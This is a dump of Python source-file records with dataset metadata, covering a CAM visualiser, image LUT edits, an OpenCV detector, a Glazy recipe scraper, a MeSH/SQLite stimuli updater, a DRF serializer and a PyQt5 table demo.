+{"seq_id": "633320797", "text": "import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nfrom PIL import Image\nfrom skimage import io\nfrom torchvision.transforms.functional import to_pil_image\n\n\nclass ClassActivationMapping:\n def __init__(\n self,\n model,\n image_path,\n transformation_pipeline,\n last_conv_layer=\"layer4\",\n device=\"cpu\",\n ):\n self.model = model\n\n self.grad_maps = []\n\n self.model._modules[last_conv_layer].register_forward_hook(self.__register_grad)\n self.weight_softmax = self.model.fc.weight.to(device)\n self.image = io.imread(image_path)\n self.__forward_img(transformation_pipeline, device)\n\n def __register_grad(self, module, input, output):\n self.grad_maps.append(output.data)\n return None\n\n def __forward_img(self, transformation_pipeline, device):\n image = transformation_pipeline(image=self.image)[\"image\"]\n image = torch.tensor(image.unsqueeze(0)).to(device)\n self.model.forward(image)\n\n def get_cam(self):\n cam = self.weight_softmax[1, :] @ torch.flatten(self.grad_maps[0], 2)\n cam = cam.view(\n self.grad_maps[0].size(0),\n 1,\n self.grad_maps[0].size(3),\n self.grad_maps[0].size(2),\n )\n cam = to_pil_image(cam[0, 0].detach().numpy())\n cam = cam - np.min(cam)\n cam = cam / np.max(cam)\n cam = Image.fromarray(np.uint8(255 * cam))\n cam = cam.resize(self.image.shape[0:2], resample=Image.BICUBIC)\n return cam\n\n def show_cam_on_image(self, cam):\n cam_color = cv2.applyColorMap(np.uint8(255 * np.array(cam)), cv2.COLORMAP_JET)\n img_cam = np.float32(cam_color) + np.float32(self.image)\n img_cam = img_cam / np.max(img_cam)\n plt.imshow(img_cam)\n plt.show()\n", "sub_path": "src/class_activation_mapping.py", "file_name": "class_activation_mapping.py", "file_ext": "py", "file_size_in_byte": 1838, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "skimage.io.imread", "line_number": 25, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 25, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.flatten", "line_number": 38, "usage_type": "call"}, {"api_name": "torchvision.transforms.functional.to_pil_image", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 47, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 48, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 48, "usage_type": "name"}, {"api_name": "numpy.uint8", "line_number": 48, "usage_type": "call"}, {"api_name": "PIL.Image.BICUBIC", "line_number": 49, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 49, "usage_type": "name"}, {"api_name": "cv2.applyColorMap", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 53, "usage_type": "call"}, {"api_name": "cv2.COLORMAP_JET", "line_number": 53, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}]}
+{"seq_id": "95090751", "text": "#!/usr/bin/python\nimport sys\n\nimport numpy as np\nfrom PIL import Image\n\nfrom utils import bound, im_to_arr\n\n\ndef lut_mainp(img, lut):\n w, h = img.shape\n flat = img.flatten()\n for x in range(len(flat)):\n flat[x] = lut[flat[x]]\n flat = flat.reshape((w, h))\n return flat\n\n\ndef main(args):\n img = im_to_arr(args[0])\n\n r_lut = bound(np.array(range(0, 256)) + 50)\n g_lut = bound(np.array(range(0, 256)) + 40)\n b_lut = bound(np.array(range(0, 256)) - 100)\n img[:, :, 0] = lut_mainp(img[:, :, 2], r_lut)\n img[:, :, 1] = lut_mainp(img[:, :, 2], g_lut)\n img[:, :, 2] = lut_mainp(img[:, :, 2], b_lut)\n\n img = Image.fromarray(img.astype(np.uint8))\n img.show()\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n", "sub_path": "Report2/R1codes/histogram_mainp.py", "file_name": "histogram_mainp.py", "file_ext": "py", "file_size_in_byte": 749, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "utils.im_to_arr", "line_number": 20, "usage_type": "call"}, {"api_name": "utils.bound", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 22, "usage_type": "call"}, {"api_name": "utils.bound", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 23, "usage_type": "call"}, {"api_name": "utils.bound", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 24, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 29, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 29, "usage_type": "name"}, {"api_name": "numpy.uint8", "line_number": 29, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 34, "usage_type": "attribute"}]}
+{"seq_id": "260803424", "text": "from math import floor\n\nimport cv2 as cv\nfrom flask import current_app\n\n\nGREEN = (0, 255, 0)\nBLACK = (0, 0, 0)\n\n\nclass ChexxTracker:\n def __init__(self, *args, **kwargs):\n self.net = cv.dnn.readNetFromTensorflow(\n str(current_app.config['DATA_MODEL_DIR'] / 'frozen_inference_graph.pb'),\n str(current_app.config['DATA_MODEL_DIR'] / 'graph.pbtxt')\n )\n self.threshold = 0.3\n\n def handle_frame(self, frame):\n rows, cols, channels = frame.shape\n self.net.setInput(cv.dnn.blobFromImage(frame, size=(300, 300), swapRB=True, crop=False))\n net_output = self.net.forward()\n\n for detection in net_output[0, 0]:\n score = float(detection[2])\n if score < self.threshold:\n continue\n\n bottom_box_left = int(detection[3] * cols)\n bottom_box_top = int(detection[4] * rows)\n bottom_box_right = int(detection[5] * cols)\n bottom_box_bottom = int(detection[6] * rows)\n\n box_offset = 25\n top_box_top = bottom_box_top + box_offset\n\n cv.rectangle(\n img=frame,\n pt1=(bottom_box_left, top_box_top),\n pt2=(bottom_box_right, bottom_box_top),\n color=GREEN,\n thickness=-1\n )\n cv.rectangle(\n img=frame,\n pt1=(bottom_box_left, bottom_box_top),\n pt2=(bottom_box_right, bottom_box_bottom),\n color=GREEN,\n thickness=2\n )\n cv.putText(\n img=frame,\n text=f'{round(score * 100)}%',\n org=(bottom_box_left, bottom_box_top + (floor(box_offset / 2))),\n fontFace=cv.FONT_HERSHEY_COMPLEX_SMALL,\n color=BLACK,\n fontScale=.9,\n lineType=1,\n thickness=1\n )\n\n return frame\n", "sub_path": "helpers.py", "file_name": "helpers.py", "file_ext": "py", "file_size_in_byte": 1945, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "cv2.dnn.readNetFromTensorflow", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.dnn", "line_number": 13, "usage_type": "attribute"}, {"api_name": "flask.current_app.config", "line_number": 14, "usage_type": "attribute"}, {"api_name": "flask.current_app", "line_number": 14, "usage_type": "name"}, {"api_name": "flask.current_app.config", "line_number": 15, "usage_type": "attribute"}, {"api_name": "flask.current_app", "line_number": 15, "usage_type": "name"}, {"api_name": "cv2.dnn.blobFromImage", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.dnn", "line_number": 21, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 44, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 51, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 54, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_COMPLEX_SMALL", "line_number": 55, "usage_type": "attribute"}]}
+{"seq_id": "293066151", "text": "\n# Hedieh Moradi- 2021- Hybrid Atelier\n# This program will go through a JSON files which contains list of API call links for glazy.org\n# This code will open each link from the file and extract the informaiton bellow\n# These data are formated to match my MongoDB schema, and you need to format it based on your needs.\n\n# Packages\nimport urllib.request as request\nimport json\n\n# Create a JSON file from the extracted data\ndef create_json(data_id):\n res ={}\n metadata_res={}\n chemistry_list= []\n properties_dic={}\n application_dic={}\n\n for chem in data_id['materialComponents']:\n material_temp={}\n material_temp['material']= chem['material']['name']\n material_temp['amount']= chem['percentageAmount']\n material_temp['unit']= 'gram'\n chemistry_list.append(material_temp)\n \n \n\n res['rfid']= None\n res['container']= None\n res['icon']= {}\n metadata_res['parent']= None\n metadata_res['children']= []\n metadata_res['class_name']= \"GlazeRFID\"\n metadata_res['name']= data_id['name']\n metadata_res[\"manufacturer\"]= data_id['createdByUser']['name']\n if data_id['description']:\n metadata_res[\"description\"]= data_id['description']\n else:\n metadata_res[\"description\"]= None\n metadata_res['url']= 'glazy.org/recipes/'+ str(data_id['id'])\n metadata_res['keys']=[]\n\n metadata_res['images']= data_id['selectedImage']['filename']\n properties_dic['firing']= data_id.get('toOrtonConeName', None)\n\n properties_dic[\"recipe\"]= chemistry_list\n properties_dic[\"total_amount\"]= data_id['materialComponentTotalAmount']\n\n application_dic[\"food_safe\"]= None\n application_dic[\"brushable\"]= None\n application_dic[\"dippable\"]= None\n application_dic[\"pourable\"]= None\n application_dic[\"sprayable\"]= None\n\n\n properties_dic['application']=application_dic\n metadata_res['properties']= properties_dic\n \n res['metadata'] = metadata_res\n return res\n\n# Open file containing API links and send request to each link \nwith open('YOUR_FIle_Local', 'r') as f:\n links= json.load(f)\n for link in links:\n with request.urlopen(link) as response:\n if response.getcode() == 200:\n source = response.read()\n data = json.loads(source)\n for entry in data['data']:\n result = create_json(entry)\n file_name= f'./glazy_glazes/glaze_{str(entry[\"id\"])}.json' #Save each JSON file using this method \"glaze_ID\"\n \n with open(file_name, 'w') as outfile:\n json.dump(result, outfile, indent=4)\n\n\n else:\n print('An error occurred while attempting to retrieve data from the API.')\n\n", "sub_path": "Step-2-glazy-to-epoch.py", "file_name": "Step-2-glazy-to-epoch.py", "file_ext": "py", "file_size_in_byte": 2765, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "json.load", "line_number": 64, "usage_type": "call"}, {"api_name": "urllib.request.urlopen", "line_number": 66, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 66, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 69, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 75, "usage_type": "call"}]}
+{"seq_id": "563103482", "text": "#!/usr/bin/python\nimport sys, os, time, sqlite3\n\ndef get_stimuli(DB):\n\n stime = time.time() #get starting time\n\n stimuli_list = [] # creat list of concepts\n \n DB = str(DB) # make DB name readable\n conn = sqlite3.connect(DB) # connect to existed DB or ceat a new one\n\n ### check connection with DB\n if conn.total_changes == 0:\n print (f\"\\nConnection with {DB} went ok\")\n else:\n print (f\"\\nconnection with {DB} didn't work\")\n sys.exit()\n\n \n c = conn.cursor() # make it able to execute commands\n\n rows = c.execute(\"SELECT * FROM stimuli\").fetchall() # get all lines in stimule table\n\n for r in rows: # get concept in each line\n concept = r[0]\n stimuli_list.append(concept)\n\n ### return a set of stimuli concepts\n etime = time.time() # get end time\n TIME = time.strftime(\"%H:%M:%S\", time.gmtime(etime-stime)) # set duration\n print (f'Stimuli list, done in {TIME}.')\n return set(stimuli_list)\n\ndef get_megaDict(DB):\n\n stime = time.time() #get starting time\n\n megadict_list = [] # creat list of terms\n \n DB = str(DB) # make DB name readable\n conn = sqlite3.connect(DB) # connect to existed DB or ceat a new one\n\n\n ### check connection with DB\n if conn.total_changes == 0:\n print (f\"\\nConnection with {DB} went ok\")\n else:\n print (f\"\\nconnection with {DB} didn't work\")\n sys.exit()\n \n c = conn.cursor() # make it able to execute commands\n\n rows = c.execute(\"SELECT * FROM mega_dictionary_taxonomy\").fetchall() # get all lines in stimule table\n\n for r in rows: # get terms in each line\n synonym = r[2]\n megadict_list.append(synonym)\n\n ### return a set of stimuli concepts\n etime = time.time() # get end time\n TIME = time.strftime(\"%H:%M:%S\", time.gmtime(etime-stime)) # set duration\n print (f'Megadict list, done in {TIME}.')\n return set(megadict_list)\n\n\ndef get_mesh(mesh_file):\n\n stime = time.time() #get starting time\n\n ### creat list of tuples and tup to be\n mesh_list = []\n\n with open(mesh_file, 'r') as fp: # read mesh_file lines - actually a XML file (tree format)\n\n for line in fp:\n line=line.strip()\n \n if not line or line.startswith(\"#\"): # ignore malformed or not interested line\n continue\n\n if line.startswith(\"\"): # find string line\n S1,L = line.split(\"\")\n L,S2 = L.split(\"\")\n mesh = L\n\n mesh_list.append(mesh) # append mesh term\n\n\n\n ### return a set of mesh concepts\n etime = time.time() # get end time\n TIME = time.strftime(\"%H:%M:%S\", time.gmtime(etime-stime)) # set duration\n print (f'\\n\\nMesh list, done in {TIME}.')\n return set(mesh_list)\n\n\n \n\n\n# Get rid of terms alread existent in stimuli table by comparing the two lists.\n# Get rid of terms that are represented in mega_dictionary \ndef make_list(DB,mesh_file):\n\n\n ### Get lists to use\n stimuli = get_stimuli(DB) # return list of stimuli concepts\n megadict = get_megaDict(DB) # return list os terms from megadict\n mesh = get_mesh(mesh_file) # return list of mesh concept \n \n\n ### make list tup and tup to be\n List_tup=[]\n tup=[]\n\n stime = time.time() #get starting time \n new_terms = (mesh|megadict) - megadict # new set without elemets from megadict\n new_set = (new_terms|stimuli) - stimuli # new set to be added, containing only new concepts\n\n for concept in new_set:\n tup.append(concept)\n tup.append('A0')\n tup=tuple(tup)\n List_tup.append(tup)\n tup=[]\n \n\n ### return a set of mesh concepts\n etime = time.time() # get end time\n TIME = time.strftime(\"%H:%M:%S\", time.gmtime(etime-stime)) # set duration\n print (f'\\n\\nList of tuple for stimuli update, done in {TIME}.')\n return List_tup\n\n\n\n\n \n########### get funtions to work ##########\n###########################################\n###########################################\n \n\n### Get variables \n#DB = sys.argv[1]\n#mesh_file = sys.argv[2]\n\n### list tup of stimuli\n#new_stimuli = make_list(DB,mesh_file)\n\n", "sub_path": "pipeline_laitor/util/UPDATE/stimuli_update.py", "file_name": "stimuli_update.py", "file_ext": "py", "file_size_in_byte": 4194, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "time.time", "line_number": 6, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 11, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 18, "usage_type": "call"}, {"api_name": "time.time", "line_number": 30, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 31, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 31, "usage_type": "call"}, {"api_name": "time.time", "line_number": 37, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 42, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 50, "usage_type": "call"}, {"api_name": "time.time", "line_number": 61, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 62, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 62, "usage_type": "call"}, {"api_name": "time.time", "line_number": 69, "usage_type": "call"}, {"api_name": "time.time", "line_number": 92, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 93, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 93, "usage_type": "call"}, {"api_name": "time.time", "line_number": 116, "usage_type": "call"}, {"api_name": "time.time", "line_number": 129, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 130, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 130, "usage_type": "call"}]}
+{"seq_id": "296315529", "text": "from rest_framework import serializers\n\nfrom main.serializers.fields import DateTimeField\nfrom payment.models import UserPayment, LocalPayment, PaymentLog, UserScriptDelegationAccess, \\\n UserOfflineScriptExportAccess\nfrom users.models import CustomUser\n\n\nclass ExportedScriptField(serializers.Field):\n def to_representation(self, offline_exported_script):\n if offline_exported_script.script_data and offline_exported_script.script and offline_exported_script.exported:\n return {\n 'id': offline_exported_script.script.id,\n 'name': offline_exported_script.script.name\n }\n\n def get_attribute(self, script):\n return script\n\n def to_internal_value(self, script):\n return script\n\n\nclass UserOfflineExportedScriptSerializer(serializers.ModelSerializer):\n date = DateTimeField(required=False, read_only=True)\n payed = DateTimeField(required=False, read_only=True)\n exported_date = DateTimeField(required=False, read_only=True)\n script = ExportedScriptField(required=False, read_only=True)\n\n class Meta:\n model = UserOfflineScriptExportAccess\n fields = ('id', 'user', 'payed', 'date', 'script', 'exported_date')\n", "sub_path": "offline/serializers.py", "file_name": "serializers.py", "file_ext": "py", "file_size_in_byte": 1217, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "rest_framework.serializers.Field", "line_number": 9, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 9, "usage_type": "name"}, {"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 24, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 24, "usage_type": "name"}, {"api_name": "main.serializers.fields.DateTimeField", "line_number": 25, "usage_type": "call"}, {"api_name": "main.serializers.fields.DateTimeField", "line_number": 26, "usage_type": "call"}, {"api_name": "main.serializers.fields.DateTimeField", "line_number": 27, "usage_type": "call"}, {"api_name": "payment.models.UserOfflineScriptExportAccess", "line_number": 31, "usage_type": "name"}]}
+{"seq_id": "296809283", "text": "import sys\n\nfrom PyQt5.QtWidgets import (QApplication, QMainWindow,\n QLabel,QTableWidgetItem,QAbstractItemView)\n\nfrom enum import Enum ##枚举类型\n\nfrom PyQt5.QtCore import pyqtSlot, Qt,QDate\n\nfrom PyQt5.QtGui import QFont, QBrush, QIcon\n\nfrom ui_MainWindow import Ui_MainWindow\n\nclass CellType(Enum): ##各单元格的类型\n ctName=1000\n ctSex =1001\n ctBirth =1002\n ctNation=1003\n ctScore=1004\n ctPartyM=1005\n\nclass FieldColNum(Enum): ##各字段在表格中的列号\n colName=0\n colSex=1\n colBirth=2\n colNation=3\n colScore=4\n colPartyM=5\n\nclass QmyMainWindow(QMainWindow): \n\n def __init__(self, parent=None):\n super().__init__(parent) #调用父类构造函数,创建窗体\n self.ui=Ui_MainWindow() #创建UI对象\n self.ui.setupUi(self) #构造UI界面\n## self.setWindowTitle(\"Demo3_10,QTableWidget的使用\")\n\n self.LabCellIndex=QLabel(\"当前单元格坐标:\",self)\n self.LabCellIndex.setMinimumWidth(250)\n self.LabCellType=QLabel(\"当前单元格类型:\",self)\n self.LabCellType.setMinimumWidth(200)\n self.LabStudID=QLabel(\"学生ID:\",self)\n self.LabStudID.setMinimumWidth(200)\n self.ui.statusBar.addWidget(self.LabCellIndex) #加到状态栏\n self.ui.statusBar.addWidget(self.LabCellType)\n self.ui.statusBar.addWidget(self.LabStudID)\n\n self.ui.tableInfo.setAlternatingRowColors(True) #交替行颜色\n self.__tableInitialized=False #表格数据未初始化\n\n\n## ==============自定义功能函数============\n def __createItemsARow(self,rowNo,name,sex,birth,nation,isParty,score): ##创建一行的items\n StudID=201805000+rowNo #学号\n\n #姓名\n item=QTableWidgetItem(name,CellType.ctName.value)\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n font=item.font()\n font.setBold(True)\n item.setFont(font)\n item.setData(Qt.UserRole,StudID) #关联数据\n self.ui.tableInfo.setItem(rowNo,FieldColNum.colName.value,item)\n\n #性别\n if (sex==\"男\"):\n icon=QIcon(\":/icons/images/boy.ico\")\n else:\n icon=QIcon(\":/icons/images/girl.ico\")\n item=QTableWidgetItem(sex,CellType.ctSex.value)\n item.setIcon(icon)\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n self.ui.tableInfo.setItem(rowNo,FieldColNum.colSex.value,item)\n\n #出生日期\n strBitrh=birth.toString(\"yyyy-MM-dd\") #日期转换为字符串\n item=QTableWidgetItem(strBitrh,CellType.ctBirth.value)\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n self.ui.tableInfo.setItem(rowNo,FieldColNum.colBirth.value,item)\n\n #民族\n item=QTableWidgetItem(nation,CellType.ctNation.value)\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n if (nation != \"汉族\"):\n item.setForeground(QBrush(Qt.blue)) \n self.ui.tableInfo.setItem(rowNo,FieldColNum.colNation.value,item)\n\n #分数\n strScore=str(score)\n item=QTableWidgetItem(strScore,CellType.ctScore.value)\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n self.ui.tableInfo.setItem(rowNo,FieldColNum.colScore.value,item)\n\n #党员\n item=QTableWidgetItem(\"党员\",CellType.ctPartyM.value)\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n if (isParty==True):\n item.setCheckState(Qt.Checked)\n else:\n item.setCheckState(Qt.Unchecked)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled | Qt.ItemIsUserCheckable) #不允许编辑文字\n item.setBackground(QBrush(Qt.yellow)) #Qt::green lightGray yellow\n self.ui.tableInfo.setItem(rowNo,FieldColNum.colPartyM.value,item) #为单元格设置Item\n \n \n## ==========由connectSlotsByName() 自动连接的槽函数================== \n @pyqtSlot() ##“设置表头”按钮\n def on_btnSetHeader_clicked(self): \n headerText=[\"姓 名\",\"性 别\",\"出生日期\",\"民 族\",\"分数\",\"是否党员\"] \n self.ui.tableInfo.setColumnCount(len(headerText)) #列数\n ## self.ui.tableInfo.setHorizontalHeaderLabels(headerText) #简单的表头文字,无格式\n \n for i in range(len(headerText)):\n headerItem=QTableWidgetItem(headerText[i])\n font=headerItem.font()\n ## font.setBold(True)\n font.setPointSize(11)\n headerItem.setFont(font)\n headerItem.setForeground(QBrush(Qt.red)) #前景色,即文字颜色\n self.ui.tableInfo.setHorizontalHeaderItem(i,headerItem)\n\n @pyqtSlot() ##设置行数\n def on_btnSetRows_clicked(self): \n self.ui.tableInfo.setRowCount(self.ui.spinRowCount.value()) #设置数据区行数\n self.ui.tableInfo.setAlternatingRowColors(self.ui.chkBoxRowColor.isChecked()) #设置交替行背景颜色\n \n\n @pyqtSlot() ##初始化表格数据\n def on_btnIniData_clicked(self): \n self.ui.tableInfo.clearContents() #清除表格内容\n\n birth=QDate(1998,6,23)\n isParty=True\n nation=\"汉族\"\n score=70\n \n rowCount=self.ui.tableInfo.rowCount() #表格行数\n for i in range(rowCount):\n strName=\"学生%d\"%i\n if ((i % 2)==0):\n strSex=\"男\"\n else:\n strSex=\"女\"\n self.__createItemsARow(i,strName,strSex,\n birth,nation,isParty,score)\n birth=birth.addDays(20)\n isParty=not isParty\n\n self.__tableInitialized=True #表格数据已初始化\n \n\n @pyqtSlot() ##插入行\n def on_btnInsertRow_clicked(self): \n curRow=self.ui.tableInfo.currentRow() #当前行号\n self.ui.tableInfo.insertRow(curRow)\n birth=QDate.fromString(\"1998-4-5\",\"yyyy-M-d\")\n self.__createItemsARow(curRow, \"新学生\", \"男\",birth,\"苗族\",True,65)\n \n @pyqtSlot() ##添加行\n def on_btnAppendRow_clicked(self): \n curRow=self.ui.tableInfo.rowCount() \n self.ui.tableInfo.insertRow(curRow)\n birth=QDate.fromString(\"1999-1-10\",\"yyyy-M-d\")\n self.__createItemsARow(curRow, \"新生\", \" 女\",birth,\"土家族\",False,86)\n \n @pyqtSlot() ##删除当前行\n def on_btnDelCurRow_clicked(self): \n curRow=self.ui.tableInfo.currentRow() #当前行号\n self.ui.tableInfo.removeRow(curRow)\n \n @pyqtSlot() ##清空表格内容\n def on_btnClearContents_clicked(self): \n self.ui.tableInfo.clearContents()\n\n @pyqtSlot() ##自动行高\n def on_btnAutoHeight_clicked(self): \n self.ui.tableInfo.resizeRowsToContents()\n \n @pyqtSlot() ##自动列宽\n def on_btnAutoWidth_clicked(self): \n self.ui.tableInfo.resizeColumnsToContents()\n\n @pyqtSlot(bool) ##表格可编辑\n def on_chkBoxEditable_clicked(self,checked): \n if (checked):\n trig=QAbstractItemView.DoubleClicked | QAbstractItemView.SelectedClicked\n else:\n trig=QAbstractItemView.NoEditTriggers #不允许编辑\n self.ui.tableInfo.setEditTriggers(trig) #不允许编辑\n\n @pyqtSlot(bool) ##交替行颜色\n def on_chkBoxRowColor_clicked(self,checked): \n self.ui.tableInfo.setAlternatingRowColors(checked)\n\n @pyqtSlot(bool) ##是否显示水平表头\n def on_chkBoxHeaderH_clicked(self,checked): \n self.ui.tableInfo.horizontalHeader().setVisible(checked)\n\n @pyqtSlot(bool) #是否显示垂直表头\n def on_chkBoxHeaderV_clicked(self,checked): \n self.ui.tableInfo.verticalHeader().setVisible(checked)\n\n @pyqtSlot() ##选择行为:行选择\n def on_radioSelectRow_clicked(self): \n selMode=QAbstractItemView.SelectRows\n self.ui.tableInfo.setSelectionBehavior(selMode)\n \n @pyqtSlot() ##选择行为:单元格选择\n def on_radioSelectItem_clicked(self):\n selMode=QAbstractItemView.SelectItems\n self.ui.tableInfo.setSelectionBehavior(selMode)\n\n\n @pyqtSlot() ##读取表格到文本\n def on_btnReadToText_clicked(self): \n self.ui.textEdit.clear()\n rowCount=self.ui.tableInfo.rowCount() #行数\n colCount=self.ui.tableInfo.columnCount() #列数\n for i in range(rowCount):\n strText=\"第 %d 行: \" %(i+1)\n for j in range(colCount-1):\n cellItem=self.ui.tableInfo.item(i,j)\n strText =strText+cellItem.text()+\" \"\n cellItem=self.ui.tableInfo.item(i,colCount-1) #最后一列\n if (cellItem.checkState() == Qt.Checked):\n strText=strText+\"党员\"\n else:\n strText=strText+\"群众\"\n self.ui.textEdit.appendPlainText(strText)\n\n\n @pyqtSlot(int,int,int,int) ##当前单元格发生变化\n def on_tableInfo_currentCellChanged(self,currentRow,currentColumn,\n previousRow,previousColumn):\n if (self.__tableInitialized ==False): #表格数据未初始化\n return\n item=self.ui.tableInfo.item(currentRow,currentColumn)#当前单元格\n if (item == None):\n return\n\n self.LabCellIndex.setText(\"当前单元格:%d 行,%d 列\"\n %(currentRow,currentColumn))\n\n itemCellType=item.type() #获取单元格的类型\n self.LabCellType.setText(\"当前单元格类型:%d\" %itemCellType)\n\n item2=self.ui.tableInfo.item(currentRow,FieldColNum.colName.value)\n studID=item2.data(Qt.UserRole) #读取用户自定义数据\n self.LabStudID.setText(\"学生ID:%d\" %studID)\n \n## =============自定义槽函数=============================== \n\n\n \n## ============窗体测试程序 ================================ \nif __name__ == \"__main__\": #用于当前窗体测试\n app = QApplication(sys.argv) #创建GUI应用程序\n form=QmyMainWindow() #创建窗体\n form.show()\n sys.exit(app.exec_())\n", "sub_path": "pyqt/DemoFullCode-PythonQt/chap03Widgets/Demo3_10TableWidget/myMainWindow.py", "file_name": "myMainWindow.py", "file_ext": "py", "file_size_in_byte": 9845, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "enum.Enum", "line_number": 14, "usage_type": "name"}, {"api_name": "enum.Enum", "line_number": 22, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMainWindow", "line_number": 30, "usage_type": "name"}, {"api_name": "ui_MainWindow.Ui_MainWindow", "line_number": 34, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 38, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 40, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 42, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 57, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.AlignHCenter", "line_number": 58, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 58, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.AlignVCenter", "line_number": 58, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt.UserRole", "line_number": 62, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 62, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 67, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 69, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 70, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.AlignHCenter", "line_number": 72, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 72, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.AlignVCenter", "line_number": 72, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 77, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.AlignHCenter", "line_number": 78, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 78, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.AlignVCenter", "line_number": 78, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 82, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.AlignHCenter", "line_number": 83, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 83, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.AlignVCenter", "line_number": 83, "usage_type": "attribute"}, {"api_name": "PyQt5.QtGui.QBrush", "line_number": 85, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.blue", "line_number": 85, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 85, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 90, "usage_type": "call"}, 